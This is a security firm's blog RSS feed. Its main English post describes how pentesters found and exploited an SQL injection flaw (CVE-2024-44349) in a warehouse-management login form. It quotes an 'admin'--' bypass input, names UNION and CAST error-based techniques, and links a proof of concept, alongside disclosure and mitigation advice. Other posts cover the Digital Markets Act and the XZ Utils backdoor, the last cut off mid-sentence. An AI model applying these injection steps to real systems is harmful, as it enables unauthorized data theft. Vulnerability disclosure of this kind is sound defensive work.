
   <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
     <channel>
       <title>CybergON Blog</title>
       <link>https://blog.cybergon.com/</link>
       <description>Recent content on CybergON Blog</description>
       <generator>Hugo -- gohugo.io</generator>
       <language>it</language>
       <copyright>Elmec Informatica S.p.A. &amp;copy; 2023</copyright>
       <lastBuildDate>Mon, 07 Oct 2024 16:25:01 +0000</lastBuildDate>
       
           <atom:link href="https://blog.cybergon.com/index.xml" rel="self" type="application/rss+xml" />
       
       
       <item>
         <title>Analysis on a new vulnerability: CVE-2024-44349</title>
         <link>https://blog.cybergon.com/posts/cve-2024-44349/</link>
         <pubDate>Mon, 07 Oct 2024 16:25:01 +0000</pubDate>
         <authors>
         
              
             <author>Andrea Ferrario</author>
         
               
             <author>Paolo Ferro</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cve-2024-44349/</guid>
         <description>

&lt;h2 id=&#34;abstract&#34;&gt;Abstract&lt;/h2&gt;

&lt;p&gt;During a black-box penetration test, we encountered a vulnerability in a software system, which allowed
unauthorized access to sensitive information. Upon identifying the issue, we promptly informed the relevant parties
and took steps to initiate a formal process for addressing the vulnerability through recognized security channels.
This article will explore the steps taken to identify the risk and the broader implications of such security weaknesses.&lt;/p&gt;

&lt;h2 id=&#34;cve-introduction&#34;&gt;CVE Introduction&lt;/h2&gt;

&lt;p&gt;We refer to the &lt;a href=&#34;https://owasp.org/Top10/&#34;&gt;OWASP framework&lt;/a&gt; when conducting Web Penetration Tests for clients.
According to &lt;a href=&#34;https://owasp.org/www-community/attacks/SQL_Injection&#34;&gt;OWASP, SQL injection (SQLi)&lt;/a&gt; is defined as follow: &lt;strong&gt;&lt;em&gt;&amp;ldquo;A SQL injection attack consists of the insertion or ‘injection’ of a SQL query
via input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data
(Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a file from the DBMS
file system, and in some cases, issue commands to the operating system.”&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The discovered CVE is &lt;strong&gt;critical&lt;/strong&gt; for companies using this WMS due to the following reasons:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Privilege escalation&lt;/strong&gt;: Attackers can execute SQL commands directly on the database underlying the web application without requiring elevated privileges.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Network-based attack vector&lt;/strong&gt;: The vulnerability can be exploited remotely, making it accessible from any location.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Credential exploitation&lt;/strong&gt;: With sufficient effort and the right conditions, attackers can discover or create valid user credentials to gain access to the web application.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This vulnerability severely compromises the &lt;a href=&#34;https://www.nccoe.nist.gov/publication/1800-26/VolA/index.html&#34;&gt;CIA triad&lt;/a&gt; —Confidentiality, Integrity, and Availability— which is the core principle of cybersecurity. Additionally,
since the affected companies fall under &lt;strong&gt;EU regulations&lt;/strong&gt;, they must adhere to &lt;a href=&#34;https://gdpr.eu/&#34;&gt;GDPR requirements&lt;/a&gt;. If a threat actor exploits this vulnerability to extract sensitive information,
both the company using the software and the company releasing it are obligated to inform the relevant Data Protection Authority without delay.&lt;/p&gt;

&lt;h2 id=&#34;description&#34;&gt;Description&lt;/h2&gt;

&lt;p&gt;Organizations using &lt;a href=&#34;https://anteeowms.com/en/strona-glowna-en/&#34;&gt;ANTEEO B2B WMS Software&lt;/a&gt; &lt;strong&gt;versions 4.7.x up to (but excluding) v4.7.34&lt;/strong&gt; are vulnerable to &lt;a href=&#34;https://www.cve.org/CVERecord?id=CVE-2024-44349&#34;&gt;CVE-2024-44349&lt;/a&gt;, putting their data at significant risk.
Below is an analysis of how this vulnerability impacts the core principles of the CIA triad:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Confidentiality&lt;/strong&gt;: This vulnerability compromises confidentiality, as it allows unauthorized users to read database content by executing SELECT queries without authentication or elevated permissions.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Integrity&lt;/strong&gt;: The vulnerability was identified in a production environment, limiting the scope of our testing. However, based on our findings, it is highly likely that both the UPDATE and INSERT functions can be exploited to modify data. We did not test the DELETE function due to the sensitive state of the production environment, but it remains a potential risk.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Availability&lt;/strong&gt;: Attackers can disrupt system availability by executing SQL commands, such as the SLEEP function, which can lead to a denial-of-service (DoS) by overwhelming the application with resource-intensive queries.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Additionally, through SQL queries, attackers &lt;strong&gt;cannot only access data directly&lt;/strong&gt; related to the software &lt;strong&gt;but also extract information about the underlying
infrastructure&lt;/strong&gt; hosting the application.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine1.png&#34; alt=&#34;login_form&#34; /&gt;&lt;/p&gt;

&lt;p&gt;To exploit the SQL injection vulnerability, we utilized &lt;strong&gt;error-based SQLi&lt;/strong&gt;, as direct output was not available. As &lt;a href=&#34;https://portswigger.net/web-security/sql-injection/blind&#34;&gt;PortSwigger&lt;/a&gt; explains: &lt;strong&gt;&lt;em&gt;“Error-based SQL injection refers to cases where you&amp;rsquo;re able to use error messages to either extract or infer sensitive data from the database, even in blind contexts. The possibilities depend on the configuration of the database and the types of errors you&amp;rsquo;re able to trigger.”&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&#34;analysis&#34;&gt;Analysis&lt;/h2&gt;

&lt;p&gt;This section outlines the techniques used to exploit the SQL injection vulnerability.
We began by identifying the vulnerability using special characters in the username field:
&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine2.png&#34; alt=&#34;first_error&#34; /&gt;&lt;/p&gt;

&lt;p&gt;By entering a single quote (&amp;lsquo;) into the username field, &lt;strong&gt;we triggered an SQL exception: &amp;ldquo;Incorrect syntax near &amp;lsquo;SELECT&amp;rsquo;&lt;/strong&gt;.&amp;rdquo; to start. This error confirmed that &lt;strong&gt;the field is vulnerable to SQL injection (SQLi).&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Given that this is a login portal, we hypothesized that the underlying SQL query might resemble something like this:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine3.png&#34; alt=&#34;query1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;To exploit the SQL injection, we focused on manipulating the $username_field. Our initial attempt to bypass authentication involved using the following string:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine4.png&#34; alt=&#34;query2&#34; /&gt;&lt;/p&gt;

&lt;p&gt;We entered &lt;strong&gt;admin&amp;rsquo;&amp;ndash;&lt;/strong&gt;, which is designed to comment out the remainder of the query and log in as the admin user. However, this resulted in an error.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine5.png&#34; alt=&#34;locked_admin&#34; /&gt;&lt;/p&gt;

&lt;p&gt;We also tested several common usernames (such as &lt;strong&gt;Administrator&lt;/strong&gt; and &lt;strong&gt;superuser&lt;/strong&gt;) but received the same output for each request. Due to the risk of causing a &lt;strong&gt;denial of service&lt;/strong&gt; (DoS) in the production environment, we limited the number of logins attempts and shifted focus to extracting information from the database.
To dump information from the database, we used a &lt;strong&gt;UNION SELECT&lt;/strong&gt; query and needed to determine the number of columns returned by the initial SELECT statement. Unfortunately, we do not have screenshots of the process; however, iterative testing revealed that the query returns three columns.&lt;/p&gt;

&lt;p&gt;Here&amp;rsquo;s an example of how we identified this:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine6.png&#34; alt=&#34;test_union_query&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Next, we focused on &lt;strong&gt;identifying the DBMS used by ANTEEO WMS&lt;/strong&gt;. To do this, we examined one of the &lt;strong&gt;POST requests&lt;/strong&gt; captured by a web proxy tool, such as CAIDO or Burp Suite.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine7.png&#34; alt=&#34;post_request&#34; /&gt;&lt;/p&gt;

&lt;p&gt;From the POST requests, we observed that the web application operates on &lt;strong&gt;ASP.NET AJAX&lt;/strong&gt;, indicating a likely use of &lt;strong&gt;Microsoft SQL Server.&lt;/strong&gt;
To confirm this, we executed the following query:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine8.png&#34; alt=&#34;union_cast_query&#34; /&gt;&lt;/p&gt;

&lt;p&gt;This query &lt;strong&gt;cast a string&lt;/strong&gt; containing &lt;strong&gt;the MSSQL version information as an integer&lt;/strong&gt;, intentionally raising an exception. The exception was then displayed in the webpage modal.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine9.png&#34; alt=&#34;server_info_query&#34; /&gt;&lt;/p&gt;

&lt;p&gt;With this simple query, we confirmed the following information about the system running ANTEEO WMS:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Database&lt;/strong&gt;: Microsoft SQL Server 2019, version 15.0.216.2&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operating System&lt;/strong&gt;: Windows Server 2022, version 10.0&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Based on this, we developed a Proof of Concept (PoC), which can be viewed on GitHub &lt;a href=&#34;https://github.com/AndreaF17/PoC-CVE-2024-44349&#34;&gt;PoC CVE-2024-44349&lt;/a&gt;, to facilitate further testing and enumeration. Below is an example from the code, demonstrating how the PoC sends the SQL query:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/CVE-2024-44349/immagine10.png&#34; alt=&#34;PoC_request_example&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;risk-impact-assessment&#34;&gt;Risk/Impact Assessment&lt;/h2&gt;

&lt;p&gt;Due to confidentiality concerns, we are unable to disclose the specific data extracted by the PoC. However, we were successfully able to enumerate the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Databases present on the server&lt;/li&gt;
&lt;li&gt;Tables and views within each database&lt;/li&gt;
&lt;li&gt;Columns of each accessible table&lt;/li&gt;
&lt;li&gt;Contents of the accessible tables&lt;/li&gt;
&lt;li&gt;Information regarding the domain, service accounts, and host used by the company hosting the software&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;By exploiting this vulnerability, malicious &lt;strong&gt;actors could potentially access sensitive information&lt;/strong&gt;, including user credentials and password hashes, which could lead to further compromise of the affected systems.&lt;/p&gt;

&lt;h2 id=&#34;mitigation-strategies&#34;&gt;Mitigation Strategies&lt;/h2&gt;

&lt;p&gt;To prevent SQL injection vulnerabilities, it is &lt;strong&gt;critical to sanitize and validate all input fields thoroughly&lt;/strong&gt;. Implementing strong input validation ensures that no malicious code can be injected into the system. Additionally, deploying &lt;strong&gt;Intrusion Detection Systems&lt;/strong&gt; (IDS) and &lt;strong&gt;Intrusion Prevention Systems&lt;/strong&gt; (IPS) can &lt;strong&gt;help identify and block potential SQL injection attempts&lt;/strong&gt; in real-time, reducing the risk of compromise. Furthermore, ingesting application logs into a &lt;strong&gt;Security Information and Event Management&lt;/strong&gt; (SIEM) system and analyzing them with the help of the &lt;strong&gt;Security Operation Center&lt;/strong&gt; (SOC) can lead to identify the attempts to dump the information.
To further mitigate the damage of a successful SQL injection attack, it is essential to &lt;strong&gt;limit the privileges assigned to each database account.&lt;/strong&gt; By ensuring that accounts have only the &lt;strong&gt;minimum necessary permissions&lt;/strong&gt;, you can significantly reduce the impact of any unauthorized access.
&lt;strong&gt;We strongly recommend updating the system to the latest version&lt;/strong&gt;, which contains patches for known vulnerabilities. However, if updating is not immediately feasible, consider placing the application behind a &lt;strong&gt;Web Application Firewall&lt;/strong&gt; (WAF) and restricting external access &lt;strong&gt;as much as possible to limit the attack surface.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;After the vulnerability notification, the vendor promptly &lt;strong&gt;patched the issue in version 4.7.34.&lt;/strong&gt; However, it is &lt;strong&gt;highly recommended to upgrade to version 5.0&lt;/strong&gt; for enhanced security and additional protections.&lt;/p&gt;

&lt;h2 id=&#34;conclusion&#34;&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;In this report, we outlined the process by which we discovered and exploited a critical vulnerability in the &lt;a href=&#34;https://anteeowms.com/en/strona-glowna-en/&#34;&gt;ANTEEO B2B WMS software&lt;/a&gt;. Following our findings, we submitted a request to the &lt;a href=&#34;https://www.cve.org/&#34;&gt;MITRE organization&lt;/a&gt;, resulting in the assignment of &lt;a href=&#34;https://www.cve.org/CVERecord?id=CVE-2024-44349&#34;&gt;CVE-2024-44349&lt;/a&gt;. This vulnerability &lt;strong&gt;allows threat actors to inject malicious SQL commands via the username parameter&lt;/strong&gt;, enabling them to access and disclose sensitive data from the underlying database.
&lt;strong&gt;The vulnerability affects versions 4.7.x through 4.7.34 (excluded)&lt;/strong&gt; of the ANTEEO B2B WMS.
&lt;a href=&#34;https://www.cve.org/CVERecord?id=CVE-2024-44349&#34;&gt;CVE-2024-44349&lt;/a&gt; represents a significant security risk and, if exploited, could lead to unauthorized data access and system compromise.
Organizations using the affected versions must prioritize patching their systems, enhance monitoring, and implement security best practices to mitigate the potential risks associated with this vulnerability and protect against future threats.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>La vulnerabilità scoperta dai nostri specialisti: come funziona e cosa fare</title>
         <link>https://blog.cybergon.com/posts/cve-cybergon/</link>
         <pubDate>Mon, 23 Sep 2024 16:25:01 +0000</pubDate>
         <authors>
         
              
             <author>Francesca Cioffi</author>
         
               
             <author>Andrea Ferrario</author>
         
               
             <author>Paolo Ferro</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cve-cybergon/</guid>
         <description>&lt;p&gt;Il Red Team di CybergON ha recentemente scoperto la &lt;a href=&#34;https://www.cve.org/CVERecord?id=CVE-2024-44349&#34;&gt;&lt;strong&gt;CVE-2024-44349&lt;/strong&gt;&lt;/a&gt;. La CVE è stata identificata durante l’attività di penetration testing sulla web application di un cliente, nello specifico un Warehouse Management System (WMS). Lo strumento coinvolto è stato sviluppato da &lt;a href=&#34;https://anteeowms.com/&#34;&gt;Anteeo&lt;/a&gt;, una software house polacca.
La vulnerabilità si realizza tramite &lt;strong&gt;SQL Injection&lt;/strong&gt; (SQLi), che consente attraverso comandi costruiti su misura di interferire o interrogare diversamente i dati presenti nel database sottostante una specifica web application.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cve-cybergon/BANNER-BLOG.png&#34; alt=&#34;BANNER-BLOG&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Nel caso in analisi, durante il penetration test è stata scoperta la possibilità di sfruttare l’SQLi all’interno del portale Anteeo WMS esposto pubblicamente alla versione 4.7.31. Il comando per innescare la vulnerabilità non risulta immediato ed è quindi difficilmente rilevabile con strumenti di scansione automatica.
Dopo alcuni tentativi, inserendo nel campo username dei particolari comandi SQL si ottiene a schermo un box di errore con informazioni che non dovrebbero essere
visibili a un utente standard.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cve-cybergon/login-anteeo.png&#34; alt=&#34;login-anteeo&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Indagando più a fondo si è arrivati a enumerare tutti i database, gli schema, le tabelle e le colonne presenti all’interno del sito, oltre che ottenere una parte
dei dati presenti nel database. Si tratta di dati sensibili riguardante l’azienda cliente su cui si stava eseguendo l’attività e che nelle mani di malintenzionati
potrebbero essere utilizzati per ricatti e rivendita.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cve-cybergon/dati-cve.png&#34; alt=&#34;dati-cve&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il Red Team di CybergON ha contattato Anteeo che in poco tempo ha sviluppato una patch e ha rilasciato il nuovo update sull’infrastruttura del cliente.
In seguito, sono stati svolti dei test e la versione 4.7.34 non risulta più vulnerabile o impattata in alcun modo. Al momento il portale non risulta raggiungibile.&lt;/p&gt;

&lt;p&gt;Cogliamo l’occasione per ricordare che è fondamentale tenere aggiornati all’ultima versione i sistemi operativi e le applicazioni di qualsiasi natura per evitare
di avere falle di sicurezza.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Digital Markets Act: come cambia lo scenario mondiale</title>
         <link>https://blog.cybergon.com/posts/digital-markets-act-come-cambia-lo-scenario-mondiale/</link>
         <pubDate>Tue, 18 Jun 2024 16:25:01 +0000</pubDate>
         <authors>
         
              
             <author>Francesca Cioffi</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/digital-markets-act-come-cambia-lo-scenario-mondiale/</guid>
         <description>

&lt;p&gt;Il 7 marzo, l’Unione Europea ha promulgato il &lt;strong&gt;Digital Markets Act&lt;/strong&gt; (DMA), la norma che regolamenta il mercato digitale europeo. L’obiettivo dichiarato è quello di rendere il mercato più accessibile e dare ai consumatori la possibilità di poter scegliere contemporaneamente tra molteplici servizi offerti dai gatekeeper.&lt;/p&gt;

&lt;p&gt;Gatekeeper, in questo caso, sono tutte le piattaforme digitali che hanno generato un fatturato annuo di minimo 7,5 miliardi di euro all’interno dell’Unione Europea negli ultimi tre anni, che hanno una valutazione di mercato superiore ai 75 miliardi di euro e che contano almeno 45 milioni di utenti finali mensili. Di queste realtà, la Commissione Europea ne ha individuate 22 che ha denominato &lt;strong&gt;CPS (Core Platform Services)&lt;/strong&gt;, ovvero i siti che “hanno un impatto significativo sul mercato interno; gestiscono un servizio di piattaforma principale che funge da importante passaggio per gli utenti commerciali per raggiungere gli utenti finali; e gode di una posizione consolidata e duratura nelle sue operazioni o è prevedibile che goda di tale posizione nel prossimo futuro&amp;rdquo;. vi rientrano i colossi del web: Alphabet (Google), Apple, Amazon, ByteDance, Meta e Microsoft. In sostanza, nell’inquadramento della Commissione del Parlamento Europeo, gatekeeper e CPS possono essere considerati sinonimi.&lt;/p&gt;

&lt;p&gt;A partire da settembre 2023, i gatekeeper hanno avuto a disposizione sei mesi per adeguarsi alla normativa ed evitare di incorrere in sanzioni da parte della Commissione Europea; infatti, le multe arrivano &lt;strong&gt;fino al 10% del fatturato totale annuo mondiale dell&amp;rsquo;azienda e fino al 20% in caso di violazioni ripetute.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I CPS hanno l’obbligo di garantire l’interoperabilità con i servizi di terze parti, consentendo loro di comunicare e integrarsi liberamente con la piattaforma. Il fine è quello di creare condizioni di parità tra le imprese evitando di creare un monopolio. In aggiunta, agli utenti deve essere garantita la portabilità dei dati e quindi avere la possibilità di trasferire i propri dati da un servizio all’altro. Tra i vari obblighi, i gatekeeper sono tenuti, su richiesta, a fornire alle aziende e alle terze parti l’accesso in tempo reale ai dati generati dagli utenti sulla loro piattaforma.&lt;/p&gt;

&lt;h2 id=&#34;i-rischi-collegati-alla-sicurezza-informatica&#34;&gt;I rischi collegati alla sicurezza informatica&lt;/h2&gt;

&lt;p&gt;Proprio l’&lt;strong&gt;interoperabilità&lt;/strong&gt; rappresenta il primo di una serie di rischi legati alla sicurezza informatica: la trasmissione di dati da un servizio all’altro, se non protetta adeguatamente, comporta un rischio notevole. In questa cornice, il corretto trattamento dei dati acquisisce un ruolo sempre più centrale nella protezione delle informazioni riservate degli utenti e, allo stesso tempo, può generare una falla di sicurezza che permette ai criminali informatici di entrare in possesso dei dati personali degli utenti.
Il DMA suggerisce un approccio insoddisfacente per i sostenitori della privacy, in cui i messaggi inviati tra due piattaforme con schemi di crittografia incompatibili vengono decifrati e ricifrati quando passano da una all&amp;rsquo;altra, interrompendo la catena di crittografia “end-to-end” e creando un punto di vulnerabilità per l&amp;rsquo;intercettazione da parte di un cattivo attore.
Questo avviene perché, attualmente, ogni servizio di messaggistica è responsabile della propria sicurezza gli utenti di un servizio sono esposti alle vulnerabilità che potrebbero risultare dall’interoperabilità.
Due facce della stessa medaglia sono la moderazione e l&amp;rsquo;abuso: se da un lato le API aperte sono una buona notizia per la scelta dei consumatori, dall&amp;rsquo;altro possono essere utilizzate da spammer, phisher e altri malintenzionati per causare problemi agli utenti all&amp;rsquo;interno del gatekeeper. Gli approcci alla moderazione e all&amp;rsquo;antiabuso su Internet oggi sono tristemente noti, con una gestione centralizzata da parte dei gatekeeper che però produce risultati sempre più irregolari. Eliminando di fatto i limiti, si crea un&amp;rsquo;opportunità necessaria per rivedere il modo in cui gli utenti e gli amministratori possono filtrare i contenuti indesiderati alle loro condizioni.&lt;/p&gt;

&lt;h2 id=&#34;apple-e-google&#34;&gt;Apple e Google&lt;/h2&gt;

&lt;p&gt;In quanto fornitori di servizi di gatekeeper, Google e Apple sono costretti ad accettare requisiti per facilitare il “sideloading”, ovvero la possibilità di installare app di terze parti senza dover passare dallo store ufficiale. Anche se questo faciliterà la concorrenza, Apple ha criticato il Digital Markets Act per aver compromesso le sue protezioni, affermando che la legge “creerà inutili vulnerabilità alla privacy e alla sicurezza”. Inoltre, poiché fino a questo momento Apple ha controllato severamente il proprio app store e i propri dispositivi, ha potuto più facilmente gestire e affrontare i problemi di sicurezza, come malware e malintenzionati.
In ogni caso, Apple si è adeguata alla normativa e ha già aperto iPhone e iPad a negozi di applicazioni alternativi.&lt;/p&gt;

&lt;p&gt;Google deve affrontare sfide simili per garantire la sicurezza di Android. Sebbene sia stato riscontrato un maggior numero di vulnerabilità nelle applicazioni Android rispetto a quelle iOS, questa differenza risulta insignificante e il livello complessivo di sicurezza dei client delle applicazioni mobili per Android e iOS è più o meno lo stesso.
L&amp;rsquo;implementazione di questi requisiti senza che siano previste specifiche caratteristiche di audit di sicurezza causerà sicuramente l&amp;rsquo;insorgere di problemi di sicurezza significativi. Quando sarà più facile per le persone installare applicazioni mobili che possono anche essere veicolo di malware in virtù di piattaforme meno controllate, è probabile che questi numeri aumentino. La questione è come gestire le conseguenze che potrebbero verificarsi.&lt;/p&gt;

&lt;p&gt;Molti esperti di sicurezza concordano sul fatto che richiedere l&amp;rsquo;interoperabilità senza compromessi accettabili in termini di sicurezza o privacy è un ostacolo molto alto, che potrebbe rivelarsi insormontabile. Le piattaforme, in aggiunta, devono prestare attenzione alla lotta contro la personificazione e al mantenimento dell&amp;rsquo;usabilità, in modo che la più ampia gamma possibile di utenti continui ad avere accesso alle comunicazioni sicure più avanzate.
&lt;strong&gt;Il DMA, di fatto, è un’opportunità per creare requisiti di sicurezza più stringenti e migliorare l’interoperabilità in termini di sicurezza.&lt;/strong&gt; Ciò può gettare le basi per la creazione di un centro di cybersecurity gestito a livello globale per il controllo delle minacce informatiche.
L’Unione Europea è chiamata ad agire tempestivamente per evitare che ci siano fallimenti nella cybersecurity.&lt;/p&gt;

&lt;h2 id=&#34;le-altre-normative&#34;&gt;Le altre normative&lt;/h2&gt;

&lt;p&gt;In Europa, già nel 2016 il GDPR aveva gettato le basi per un corretto trattamento dei dati degli utenti finali, esplicitando regole precise a cui sottostare per non violare la privacy degli utenti e consentire alle persone di avere maggiore controllo sui loro dati personali.&lt;/p&gt;

&lt;p&gt;In &lt;strong&gt;Giappone&lt;/strong&gt;, Tokyo si rivolge ad alcuni mercati ristretti e principalmente a uno, quello degli app store. La legislazione che dovrebbe essere inviata al parlamento quest&amp;rsquo;anno autorizzerebbe la Japan Fair Trade Commission a costringere Apple e Google ad autorizzare app store e sistemi di pagamento di terze parti.
Per quanto riguarda la ricerca, la legislazione proposta potrebbe impedire a Google di riservare un trattamento preferenziale ai propri servizi. Secondo quanto riferito, nessuna società giapponese rientrerà nel campo di applicazione.&lt;/p&gt;

&lt;p&gt;Se prima della Brexit il &lt;strong&gt;Regno Unito&lt;/strong&gt; voleva liberarsi dall’eccessiva regolamentazione digitale dell’UE ora vuole impiegare l’Antitrust per affrontare i colossi del mercato digitale. Infatti, in base al &lt;strong&gt;&lt;em&gt;Digital Markets Competition and Consumers Bill&lt;/em&gt;&lt;/strong&gt;, che dovrebbe diventare legge quest&amp;rsquo;anno, le maggiori aziende tecnologiche ritenute strategiche per il mercato, comparabili ai gatekeeper designati dal DMA, dovranno aprire i loro dati ai motori di ricerca rivali, rivedere i loro app store, intensificare la lotta contro le false recensioni online e allentare i vincoli sugli abbonamenti. Anche in questo caso, l&amp;rsquo;obiettivo è ridurre la posizione dominante che un piccolo numero di aziende tecnologiche detiene su consumatori e imprese. Le aziende, che verranno individuate dall’Unità per i mercati digitali dell’antitrust britannico, che violano la nuova legge rischiano &lt;strong&gt;multe fino al 10% del fatturato globale.&lt;/strong&gt;
Nel complesso, il nuovo disegno di legge assomiglia al DMA dell&amp;rsquo;UE, anche se per certi aspetti è più stringente: potrebbe includere i mercati di streaming video e attività specifiche come Amazon Prime.&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;In conclusione, l’Unione Europea ha delineato per la prima volta un quadro di regole che, al momento, riguardano unicamente i leader del mercato digitale. Tuttavia, se l’idea è quella di stabilire una concorrenza equa, non è escluso che tali regole vegano estese ad altri attori dell’industria digitale che attualmente non rientrano nei parametri definiti dalla Commissione Europea. Per quanto sia apprezzabile il tentativo di regolamentare il mercato digitale, è quantomai urgente prestare attenzione ai problemi di sicurezza che possono insorgere e adoperarsi per adottare una linea condivisa di prevenzione e protezione.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Fiction o realtà? Storia di una compromissione che ha colpito Linux</title>
         <link>https://blog.cybergon.com/posts/fiction-o-realta-storia-di-una-compromissione-linux/</link>
         <pubDate>Thu, 09 May 2024 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Francesca Cioffi</author>
         
               
             <author>Matteo Montoli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/fiction-o-realta-storia-di-una-compromissione-linux/</guid>
         <description>

&lt;p&gt;All’inizio del mese di aprile è stata scoperta una &lt;strong&gt;backdoor presente nella libreria XZ Utils&lt;/strong&gt;, che ha colpito il sistema operativo Linux, portando nuovamente l’attenzione sui rischi legati all’utilizzo di sistemi operativi open source.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/compromissione-linux/compromissione-copertina-linux.png&#34; alt=&#34;compromissione-linux-copertina&#34; /&gt;&lt;/p&gt;

&lt;p&gt;XZ Utils è una libreria di compressione dati precedentemente conosciuta come LZMA Utils.&lt;/p&gt;

&lt;p&gt;La backdoor in questione è stata creata da &lt;strong&gt;JiaTan&lt;/strong&gt;, un utente che da tempo militava nella repository GitHub del progetto Tukaani. Non si hanno molte informazioni su questa persona, potrebbe essere un singolo oppure un gruppo criminale strutturato che agisce per fini specifici.&lt;/p&gt;

&lt;h2 id=&#34;cronologia-della-compromissione&#34;&gt;Cronologia della compromissione&lt;/h2&gt;

&lt;p&gt;L’inizio di questa compromissione ha avuto luogo a fine 2021, quando JiaTan crea il suo account e inizia a compiere attività relative a Tukaani, acquisendo man mano
credibilità agli occhi della community.
Nel frattempo, appare sulla scena un nuovo attore: Dennis Ens. Ens dà supporto a JiaTan e mette pressione all’owner di Tukaani, Lasse Collin, affinché inserisca Tan come maintainer della repository di GitHub. &lt;strong&gt;Ens non è l’unico a mettere pressione a Collin&lt;/strong&gt;: già nei mesi antecedenti decine di utenti avevano iniziato ad avanzare la
stessa richiesta.&lt;br /&gt;
Verso la fine del 2022, &lt;strong&gt;Jia diventa maintainer acquisendo ancora più responsabilità e credito.&lt;/strong&gt; Grazie a questo ruolo ha la possibilità di portare avanti il progetto XZ Utils rilasciando aggiornamenti e nuove versioni della repository.  Eseguendo diversi test, Jia inserisce una parte di malware nella piattaforma di produzione e si ipotizza che disabiliti la funzione di ifunc, impedendo di fatto il successivo rilevamento di modifiche pericolose e dandogli la possibilità di inserirle in XZ Utils.
In questo momento inizia il vero e proprio attacco all’intero progetto Tukaani e viene creata la backdoor che permette a eventuali attaccanti di prendere il controllo del sistema operativo in questione.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/compromissione-linux/linux-vignetta.png&#34; alt=&#34;Backdoor Linux&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;le-versioni-del-codice&#34;&gt;Le versioni del codice&lt;/h2&gt;

&lt;p&gt;Il codice è stato progettato per essere eseguito alla fine di uno script e modificare la libreria all&amp;rsquo;interno del pacchetto XZ Utils, per &lt;strong&gt;fornire un accesso non autorizzato al sistema.&lt;/strong&gt; Questo avviene tramite l&amp;rsquo;elusione dei protocolli SSH di autenticazione e di accesso a interi sistemi da remoto. Il codice malevolo trovato dimostra quanto sia fondamentale per le organizzazioni seguire le best practice, tra cui evitare l&amp;rsquo;esposizione SSH direttamente a Internet, ove possibile, e implementare misure di sicurezza aggiuntive, come il limitare le connessioni da range IP sconosciuti, disabilitare autenticazione tramite password e impostare il fail to ban.&lt;/p&gt;

&lt;p&gt;Le versione 5.6.0. e 5.6.1. sono state quindi rilasciate a febbraio 2023. Tan e altri collaboratori hanno esortato gli sviluppatori di Ubuntu, Red Hat e Debian a scaricare gli aggiornamenti, anche se senza esito. Queste versioni sono state riconosciute come ospitanti una backdoor progettata per permettere l&amp;rsquo;accesso non autorizzato. Per questo,
